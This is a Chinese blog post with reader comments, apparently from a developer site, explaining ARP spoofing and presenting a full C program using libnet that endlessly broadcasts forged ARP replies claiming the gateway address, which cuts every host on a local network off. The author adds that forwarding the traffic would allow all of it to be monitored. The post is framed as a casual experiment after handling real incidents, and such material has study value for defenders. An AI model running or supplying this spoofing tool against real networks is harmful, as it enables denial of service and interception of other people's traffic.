文档章节

Linux下使用libnet实现ARP攻击

季牧云
 季牧云
发布于 2013/11/27 17:53
字数 779
阅读 4351
收藏 123

    闲来无事,用libnet写了个简单的ARP攻击。以前感觉ARP攻击不是特别常见,不过最近工作中倒是遇到过两次ARP欺骗的事件。其实ARP欺骗的原理灰常简单滴,大部分都是在局域网中发送伪造的ARP广播包, 广播包的目的是干嘛呢?很简单,欺骗内网的所有主机,告诉受害主机,“我”是网关。 内网机器接收到这种广播包之后,会刷新自己ARP缓存表,把网关的IP和广播包中的源MAC绑定。这样攻击机器就达到了冒充网关的目的。

    上次一所大学就是被ARP欺骗攻击,他们的学校主页一打开就会跳出其他很多乱七八糟的页面,,,,当时查看他们WEB服务器的源代码,发现没有被插入这些<iframe>会弹页面的代码,但是用浏览器外网访问的时候,这些代码就出现了,很明显网站的返回的客户端数据在途中被劫持修改了(插入了一些代码)。

    下面实现的就比较简单了,只做欺骗,不做转发,导致的后果就是局域网所有主机会断网。测试了一下,内网主机会无法上网,安了360ARP防护的会报警,能上网,就是网速有点慢,但是识别出了的攻击主机好像不准确,试了几次都识别成正常的电脑在攻击,不知道360这个识别是不是通过源MAC地址识别还是怎么识别。


#include "arp.h"

int main(int argc,char **argv){
	libnet_t *l;
	int i,packet_size;		//发送的数据包的长度
	libnet_ptag_t arp_tag,ether_tag;
	char *device="eth0";
	char err_buf[LIBNET_ERRBUF_SIZE];
	char *destion_ip_str = "255.255.255.255";
	char *source_ip_str = "192.168.1.1";
	u_char source_hardware[6]={0x00,0x0c,0x29,0x68,0x95,0x84};
	u_char destion_hardware[6]={0xff,0xff,0xff,0xff,0xff,0xff};
	u_int32_t source_ip,destion_ip;
	//将字符形式ip转换为网络字节序
	source_ip = libnet_name2addr4(l,source_ip_str,LIBNET_RESOLVE);
	destion_ip = libnet_name2addr4(l,destion_ip_str,LIBNET_RESOLVE);
	//初始化libnet句柄
	l = libnet_init(LIBNET_LINK,device,err_buf);
	if(l == NULL){
		printf("初始化libnet句柄失败:%s\n",err_buf);
		exit(-1);
	}
	arp_tag = libnet_build_arp(
		ARPHRD_ETHER,		//硬件地址类型,此处为以太网类型
		ETHERTYPE_IP,		//协议地址类型
		6,
		4,
		ARPOP_REPLY,		//ARP应答
		source_hardware,
		(u_int8_t *)&source_ip,
		destion_hardware,
		(u_int8_t *)&destion_ip,
		NULL,		//无负载
		0,			//负载长度为0
		l,
		0		//协议块标记,为0,表示新建协议块
		);
	ether_tag = libnet_build_ethernet(
		(u_int8_t *)&destion_hardware,
		(u_int8_t *)&source_hardware,
		ETHERTYPE_ARP,
		NULL,
		0,
		l,
		0
		);
	i = 0;
	while(1){
		packet_size = libnet_write(l);		//发送构造的ARP数据包
		usleep(10);
		i++;
	}
	printf("数据包长度为:%d\n",packet_size);
	libnet_destroy(l);
	return 0;
}



   目标MAC为广播地址,全0xff就行,源MAC地址可以为本机MAC或者随便伪造的MAC(在程序中获取本机MAC可用ioctl函数,最近在写DDOS攻击程序就是用ioctl获取本机MAC和IP的),注意ARP包类型为ARPOP_REPLY(应答包)。

    如果不想弄断网,只进行欺骗的话,数据发送过来之后,要进行转发到正确的网关,这样就保证内网网络正常,而且所有数据都被监听了(人太懒,不想写)~~~ 

© 著作权归作者所有

季牧云
粉丝 20
博文 25
码字总数 18661
作品 0
浦东
其他
私信 提问
加载中

评论(15)

yyliu
yyliu
这是。。。linbnet-1.0?
季牧云
季牧云 博主

引用来自“我喜欢吴佳旻”的评论

git系列教程也是楼主写的, 好厉害,请教怎么学习linux

git转的哦,,我也是linux菜鸟,只不过一直搞linux编程而已
季牧云
季牧云 博主

引用来自“块块”的评论

360识别不准就不要去识别吗,欺骗老百姓

至少还能绑定IP和mac,保证能够上网、、、、、、
季牧云
季牧云 博主

引用来自“xuezhimeng”的评论

用winpcap写过。还有一种欺骗方式是发数据包欺骗网关。

处理过的都是冒充网关,篡改数据的,感觉欺骗网关危害没有冒充大
刘越
刘越

引用来自“季牧云”的评论

引用来自“刘越”的评论

引用来自“xuezhimeng”的评论

用winpcap写过。还有一种欺骗方式是发数据包欺骗网关。

我以前也用Winpcap写过(Java的Jpcap),感觉好无聊。13

只是最近处理了两个ARP攻击,就自己随便写写试试,顺便写个博客的,不知道为啥首页了,见笑见笑~~21

其实我以前是为了用学校机房的局域网学习一下ARP。哈哈(当时最拿手的只有Java,对C还不是很了解)28
季牧云
季牧云 博主

引用来自“刘越”的评论

引用来自“xuezhimeng”的评论

用winpcap写过。还有一种欺骗方式是发数据包欺骗网关。

我以前也用Winpcap写过(Java的Jpcap),感觉好无聊。13

只是最近处理了两个ARP攻击,就自己随便写写试试,顺便写个博客的,不知道为啥首页了,见笑见笑~~21
刘越
刘越

引用来自“xuezhimeng”的评论

用winpcap写过。还有一种欺骗方式是发数据包欺骗网关。

我以前也用Winpcap写过(Java的Jpcap),感觉好无聊。13
块块
块块
360识别不准就不要去识别吗,欺骗老百姓
王振威
王振威
这是要干嘛?
iuKa
iuKa
不明觉厉
linux 下的arp 攻击的最终解决方案

话说楼主今天又被arp 攻击了,arp -s 192.168.1.1 mac 这个方法已经不管用了,于是参考了一片文章,自己并且亲自试验了一下,效果很不错。 下面给出具体解决方案 —————————————...

首席安全砖家
2013/04/15
658
1
会话劫持攻击实战zz

会话劫持攻击实战 工具及图片都在压缩包中,解压密码:www.ringz.org http://dahubaobao.go.nease.net/Hijack.rar 欢迎进入环形区,一群技术狂热者的社区,www.ringz.org欢迎你的加入! 注:...

zt371
2009/05/05
605
0
解决方案 VMware5安装集群LVS实战解析

环境描述:本文在配置LVS时使用三台linux,虚拟VIP:192.168.8.11 一台做Directorserver(192.168.8.2) ,操作系统RedhatAS4 两台做realserver(192.168.8.5,192.168.8.6) 操作系统RedhatAS4 在配...

红薯
2009/05/07
1K
0
ARP缓存表的构成ARP协议全面实战协议详解、攻击与防御

ARP缓存表的构成ARP协议全面实战协议详解、攻击与防御 1.4.3 ARP缓存表的构成 在局域网的任何一台主机中,都有一个ARP缓存表。该缓存表中保存中多个ARP条目。每个ARP条目都是由一个IP地址和一...

大学霸
2015/02/11
584
0
ubuntu QT 下 实现libnet设计网络数据包发送

在linux下 使用libnet库函数 在编译的时候g++ a.c -o a.o -lnet,在终端下可以使用,但是到QT这里,qmake不会自带-lnet,导致出错,怎么破?

靴子小生
2014/01/04
329
2

没有更多内容

加载失败,请刷新页面

加载更多

采坑指南——k8s域名解析coredns问题排查过程

正文 前几天,在ucloud上搭建的k8s集群(搭建教程后续会发出)。今天发现域名解析不了。 组件版本:k8s 1.15.0,coredns:1.3.1 过程是这样的: 首先用以下yaml文件创建了一个nginx服务 apiV...

码农实战
22分钟前
2
0
【2019年8月版本】OCP 071认证考试最新版本的考试原题-第6题

choose three Which three statements are true about indexes and their administration in an Orade database? A) An INVISIBLE index is not maintained when Data Manipulation Language......

oschina_5359
25分钟前
2
0
阿里巴巴开源 Dragonwell JDK 最新版本 8.1.1-GA 发布

导读:新版本主要有三大变化:同步了 OpenJDK 上游社区 jdk8u222-ga 的最新更新;带来了正式的 feature:G1ElasticHeap;发布了用户期待的 Windows 实验版本 Experimental Windows version。...

阿里巴巴云原生
30分钟前
2
0
教你玩转Linux—磁盘管理

Linux磁盘管理好坏直接关系到整个系统的性能问题,Linux磁盘管理常用三个命令为df、du和fdisk。 df df命令参数功能:检查文件系统的磁盘空间占用情况。可以利用该命令来获取硬盘被占用了多少...

xiangyunyan
33分钟前
5
0
js 让textarea的高度自适应父元素的高度

textarea按照普通元素设置height是没有作用的,可以这么来设置, 下面给上一段项目代码 JS代码: $.fn.extend({ txtaAutoHeight: function () { return this.each(function () {...

文文1
34分钟前
2
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部